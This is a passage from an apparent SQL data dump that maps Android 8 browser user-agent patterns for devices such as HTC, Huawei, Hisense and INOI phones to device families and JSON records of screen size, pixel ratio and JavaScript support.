Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; GS80) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Gaia) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Galaxy Nexus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_samsung_gt','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Griffe T5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Griffe T6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Griffe T7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H1A1000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H3113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H3123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H3213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H3223) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H3413) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H4113) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H4133) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H4213) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H4413) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H4493) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H8216) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H8266) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H8296) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H8314) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; H8324) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HALO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HEYOU1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HEYOU3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HEYOU30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HEYOU5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC 10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC 2PZF1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC Desire 12+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC Desire 12s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U Ultra) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U11 Life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U11 life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U11 plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U12 life) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC U12+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC6545LVW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC_2Q4D100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC_M10h) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC_U-1u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTC_U-3u) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_htc','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HTV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HUAWEI NXT-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HUAWEI NXT-DL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_huawei','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HW-01K) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":747,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HWI-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HWV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HWV32) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; HYPE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hammer Energy) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hammer_Active2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hammer_Active2_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hammer_Blade2_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hammer_Energy_18x9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hisense F25) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hisense F35) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hisense Infinity H12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hisense U605) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hisense U965) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_hisense','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Hummer_2019_R) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; I3312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; I4312) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; I4332) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; IMO Q3 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INE-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INE-LX1r) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INE-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INE-LX2r) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI 2 Lite 2019) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI 2 Lite 4Gb) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_1_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_3_POWER) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_5i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_5i_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; INOI_7_LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ilium Alpha 3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ilium M5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ilium M7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ilium M9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Impress Click NFC) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 